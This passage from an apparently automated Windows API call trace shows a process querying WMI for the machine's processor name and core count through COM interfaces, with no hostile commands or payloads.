puBuffLength=0x36f21c*=0x0, pszText=0x0 | out: puBuffLength=0x36f21c*=0xf, pszText=0x0) returned 0x0 [0200.720] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.720] CoGetContextToken (in: pToken=0x36f074 | out: pToken=0x36f074) returned 0x0 [0200.720] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f22c | out: ppEnum=0x36f22c*=0x70f9f0) returned 0x0 [0200.721] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0e8 | out: ppvObject=0x36f0e8*=0x70f9f4) returned 0x0 [0200.722] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f138, pAuthzSvc=0x36f134, pServerPrincName=0x36f12c, pAuthnLevel=0x36f130, pImpLevel=0x36f120, pAuthInfo=0x36f124, pCapabilites=0x36f128 | out: pAuthnSvc=0x36f138*=0xa, pAuthzSvc=0x36f134*=0x0, pServerPrincName=0x36f12c, pAuthnLevel=0x36f130*=0x6, pImpLevel=0x36f120*=0x2, pAuthInfo=0x36f124, pCapabilites=0x36f128*=0x1) returned 0x0 [0200.722] IUnknown:Release (This=0x70f9f4) returned 0x1 [0200.722] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0dc | out: ppvObject=0x36f0dc*=0x784d24) returned 0x0 [0200.722] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0c8 | out: ppvObject=0x36f0c8*=0x70f9f4) returned 0x0 [0200.722] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0200.724] IUnknown:Release (This=0x70f9f4) returned 0x2 [0200.724] WbemLocator:IUnknown:Release (This=0x784d24) returned 0x1 [0200.724] CoTaskMemFree (pv=0x793eb8) [0200.724] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0200.724] CoGetContextToken (in: pToken=0x36e5f8 | out: pToken=0x36e5f8) returned 0x0 [0200.725] CoGetContextToken (in: pToken=0x36ea0c | out: pToken=0x36ea0c) returned 0x0 [0200.725] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9a4 | out: ppvObject=0x36e9a4*=0x784d0c) returned 0x0 [0200.725] WbemLocator:IRpcOptions:Query (in: This=0x784d0c, pPrx=0x787b60, dwProperty=2, pdwValue=0x36ea98 | out: pdwValue=0x36ea98) returned 0x80004002 [0200.725] WbemLocator:IUnknown:Release (This=0x784d0c) returned 0x2 [0200.725] CoGetContextToken (in: pToken=0x36efdc | out: pToken=0x36efdc) returned 0x0 [0200.725] CoGetContextToken (in: pToken=0x36ef3c | out: pToken=0x36ef3c) returned 0x0 [0200.725] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36f00c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36eed8 | out: ppvObject=0x36eed8*=0x70f9f0) returned 0x0 [0200.725] IUnknown:Release (This=0x70f9f0) returned 0x2 [0200.725] SysStringLen (param_1=0x0) returned 0x0 [0200.725] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0200.774] CoTaskMemAlloc (cb=0x4) returned 0x769518 [0200.774] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x769518, puReturned=0x244fd10 | out: apObjects=0x769518*=0x5e88ca8, puReturned=0x244fd10*=0x1) returned 0x0 [0214.323] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e884 | out: ppvObject=0x36e884*=0x5e88ca8) returned 0x0 [0214.323] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e838 | out: ppvObject=0x36e838*=0x0) returned 0x80004002 [0214.323] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e660 | out: ppvObject=0x36e660*=0x0) returned 0x80004002 [0214.324] IUnknown:AddRef (This=0x5e88ca8) returned 0x3 [0214.324] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e194 | out: ppvObject=0x36e194*=0x0) returned 0x80004002 [0214.324] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e144 | out: ppvObject=0x36e144*=0x0) returned 0x80004002 [0214.324] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e150 | out: ppvObject=0x36e150*=0x5e88cac) returned 0x0 [0214.325] IMarshal:GetUnmarshalClass (in: This=0x5e88cac, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e158 | out: pCid=0x36e158*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.325] IUnknown:Release (This=0x5e88cac) returned 0x3 [0214.325] CoGetContextToken (in: pToken=0x36e1b0 | out: pToken=0x36e1b0) returned 0x0 [0214.325] CoGetContextToken (in: pToken=0x36e5c4 | out: pToken=0x36e5c4) returned 0x0 [0214.325] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e644 | out: ppvObject=0x36e644*=0x0) returned 0x80004002 [0214.325] IUnknown:Release (This=0x5e88ca8) returned 0x2 [0214.325] CoGetContextToken (in: pToken=0x36ebac | out: pToken=0x36ebac) returned 0x0 [0214.325] CoGetContextToken (in: pToken=0x36eb0c | out: pToken=0x36eb0c) returned 0x0 [0214.325] IUnknown:QueryInterface (in: This=0x5e88ca8, riid=0x36ebdc*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36ebd8 | out: ppvObject=0x36ebd8*=0x5e88ca8) returned 0x0 [0214.326] IUnknown:AddRef (This=0x5e88ca8) returned 0x4 [0214.326] IUnknown:Release (This=0x5e88ca8) returned 0x3 [0214.326] IUnknown:Release (This=0x5e88ca8) returned 0x2 [0214.326] CoTaskMemFree (pv=0x769518) [0214.326] CoGetContextToken (in: pToken=0x36ef1c | out: pToken=0x36ef1c) returned 0x0 [0214.326] IUnknown:AddRef (This=0x5e88ca8) returned 0x3 [0214.327] IWbemClassObject:Get (in: This=0x5e88ca8, wszName="__GENUS", lFlags=0, pVal=0x36f21c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f29c*=0, plFlavor=0x36f298*=0 | out: pVal=0x36f21c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f29c*=3, plFlavor=0x36f298*=64) returned 0x0 [0214.328] IWbemClassObject:Get (in: This=0x5e88ca8, wszName="__PATH", lFlags=0, pVal=0x36f200*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f284*=0, plFlavor=0x36f280*=0 | out: pVal=0x36f200*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x36f284*=8, plFlavor=0x36f280*=64) returned 0x0 [0214.328] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6e [0214.328] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6e [0214.329] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f22c | out: ppv=0x36f22c*=0x6ee4bc) returned 0x0 [0214.329] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f224 | out: pAptType=0x36f224*=1) returned 0x0 [0214.329] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f228 | out: ppvObject=0x36f228*=0x0) returned 0x80004002 [0214.329] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0214.333] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb98 | out: ppv=0x36eb98*=0x769518) returned 0x0 [0214.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x769518, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edb0 | out: ppvObject=0x36edb0*=0x0) returned 0x80004002 [0214.334] WbemDefPath:IClassFactory:CreateInstance (in: This=0x769518, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36edbc | out: ppvObject=0x36edbc*=0x768c18) returned 0x0 [0214.335] WbemDefPath:IUnknown:Release (This=0x769518) returned 0x0 [0214.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9dc | out: ppvObject=0x36e9dc*=0x768c18) returned 0x0 [0214.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e990 | out: ppvObject=0x36e990*=0x0) returned 0x80004002 [0214.335] WbemDefPath:IUnknown:AddRef (This=0x768c18) returned 0x3 [0214.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e2ec | out: ppvObject=0x36e2ec*=0x0) returned 0x80004002 [0214.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e29c | out: ppvObject=0x36e29c*=0x0) returned 0x80004002 [0214.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2a8 | out: ppvObject=0x36e2a8*=0x769538) returned 0x0 [0214.336] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x769538, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2b0 | out: pCid=0x36e2b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.336] WbemDefPath:IUnknown:Release (This=0x769538) returned 0x3 [0214.336] CoGetContextToken (in: pToken=0x36e308 | out: pToken=0x36e308) returned 0x0 [0214.336] CoGetContextToken (in: pToken=0x36e71c | out: pToken=0x36e71c) returned 0x0 [0214.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e79c | out: ppvObject=0x36e79c*=0x0) returned 0x80004002 [0214.336] WbemDefPath:IUnknown:Release (This=0x768c18) returned 0x2 [0214.336] WbemDefPath:IUnknown:Release (This=0x768c18) returned 0x1 [0214.336] CoGetContextToken (in: pToken=0x36f0ac | out: pToken=0x36f0ac) returned 0x0 [0214.336] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0214.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x768c18, riid=0x36f0dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f0d8 | out: ppvObject=0x36f0d8*=0x768c18) returned 0x0 [0214.336] WbemDefPath:IUnknown:AddRef (This=0x768c18) returned 0x3 [0214.336] WbemDefPath:IUnknown:Release (This=0x768c18) returned 0x2 [0214.336] WbemDefPath:IWbemPath:SetText (This=0x768c18, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0214.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f258 | out: puCount=0x36f258*=0x2) returned 0x0 [0214.337] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f254*=0x0, pszText=0x0 | out: puBuffLength=0x36f254*=0xf, pszText=0x0) returned 0x0 [0214.337] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f254*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f254*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.337] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f224 | out: puCount=0x36f224*=0x2) returned 0x0 [0214.337] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f220*=0x0, pszText=0x0 | out: puBuffLength=0x36f220*=0xf, pszText=0x0) returned 0x0 [0214.337] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f220*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f220*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.338] IWbemClassObject:Get (in: This=0x5e88ca8, wszName="Name", lFlags=0, pVal=0x36f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24505f8*=0, plFlavor=0x24505fc*=0 | out: pVal=0x36f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x24505f8*=8, plFlavor=0x24505fc*=0) returned 0x0 [0214.338] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0214.338] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0214.338] IWbemClassObject:Get (in: This=0x5e88ca8, wszName="Name", lFlags=0, pVal=0x36f228*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24505f8*=8, plFlavor=0x24505fc*=0 | out: pVal=0x36f228*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x24505f8*=8, plFlavor=0x24505fc*=0) returned 0x0 [0214.338] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0214.338] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0214.338] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f224 | out: puCount=0x36f224*=0x2) returned 0x0 [0214.338] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f220*=0x0, pszText=0x0 | out: puBuffLength=0x36f220*=0xf, pszText=0x0) returned 0x0 [0214.338] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f220*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f220*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.338] IWbemClassObject:Get (in: This=0x5e88ca8, wszName="NumberOfCores", lFlags=0, pVal=0x36f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2450704*=0, plFlavor=0x2450708*=0 | out: pVal=0x36f220*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x2450704*=19, plFlavor=0x2450708*=0) returned 0x0 [0214.339] IWbemClassObject:Get (in: This=0x5e88ca8, wszName="NumberOfCores", lFlags=0, pVal=0x36f228*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2450704*=19, plFlavor=0x2450708*=0 | out: pVal=0x36f228*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x2450704*=19, plFlavor=0x2450708*=0) returned 0x0 [0214.419] CoTaskMemAlloc (cb=0x4) returned 0x5e89070 [0214.419] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89070, puReturned=0x244fd10 | out: apObjects=0x5e89070*=0x0, puReturned=0x244fd10*=0x0) returned 0x1 [0214.443] CoTaskMemFree (pv=0x5e89070) [0214.444] CoGetContextToken (in: pToken=0x36f150 | out: pToken=0x36f150) returned 0x0 [0214.444] IUnknown:Release (This=0x70f9f0) returned 0x1 [0214.444] IUnknown:Release (This=0x70f9f0) returned 0x0 [0214.446] CoGetContextToken (in: pToken=0x36f150 | out: pToken=0x36f150) returned 0x0 [0214.446] IUnknown:Release (This=0x70f928) returned 0x1 [0214.446] IUnknown:Release (This=0x70f928) returned 0x0 [0214.487] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f244 | out: ppv=0x36f244*=0x6ee4bc) returned 0x0 [0214.487] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f23c | out: pAptType=0x36f23c*=1) returned 0x0 [0214.487] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f240 | out: ppvObject=0x36f240*=0x0) returned 0x80004002 [0214.487] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0214.489] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebb0 | out: ppv=0x36ebb0*=0x5e89070) returned 0x0 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89070, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x0) returned 0x80004002 [0214.489] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89070, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36edd4 | out: ppvObject=0x36edd4*=0x768ba8) returned 0x0 [0214.489] WbemDefPath:IUnknown:Release (This=0x5e89070) returned 0x0 [0214.489] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9f4 | out: ppvObject=0x36e9f4*=0x768ba8) returned 0x0 [0214.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9a8 | out: ppvObject=0x36e9a8*=0x0) returned 0x80004002 [0214.490] WbemDefPath:IUnknown:AddRef (This=0x768ba8) returned 0x3 [0214.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e304 | out: ppvObject=0x36e304*=0x0) returned 0x80004002 [0214.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2b4 | out: ppvObject=0x36e2b4*=0x0) returned 0x80004002 [0214.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2c0 | out: ppvObject=0x36e2c0*=0x5e89080) returned 0x0 [0214.490] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89080, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2c8 | out: pCid=0x36e2c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.490] WbemDefPath:IUnknown:Release (This=0x5e89080) returned 0x3 [0214.490] CoGetContextToken (in: pToken=0x36e320 | out: pToken=0x36e320) returned 0x0 [0214.490] CoGetContextToken (in: pToken=0x36e734 | out: pToken=0x36e734) returned 0x0 [0214.490] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7b4 | out: ppvObject=0x36e7b4*=0x0) returned 0x80004002 [0214.491] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x2 [0214.491] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x1 [0214.491] CoGetContextToken (in: pToken=0x36f0c4 | out: pToken=0x36f0c4) returned 0x0 [0214.491] CoGetContextToken (in: pToken=0x36f024 | out: pToken=0x36f024) returned 0x0 [0214.491] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x36f0f4*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f0f0 | out: ppvObject=0x36f0f0*=0x768ba8) returned 0x0 [0214.491] WbemDefPath:IUnknown:AddRef (This=0x768ba8) returned 0x3 [0214.491] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x2 [0214.491] WbemDefPath:IWbemPath:SetText (This=0x768ba8, uMode=0x4, pszPath="root\\CIMV2") returned 0x0 [0214.491] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768ba8, puCount=0x36f26c | out: puCount=0x36f26c*=0x2) returned 0x0 [0214.491] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f268*=0x0, pszText=0x0 | out: puBuffLength=0x36f268*=0xf, pszText=0x0) returned 0x0 [0214.491] WbemDefPath:IWbemPath:GetText (in: This=0x768ba8, lFlags=4, puBuffLength=0x36f268*=0xf, pszText="00000000000000" | out: 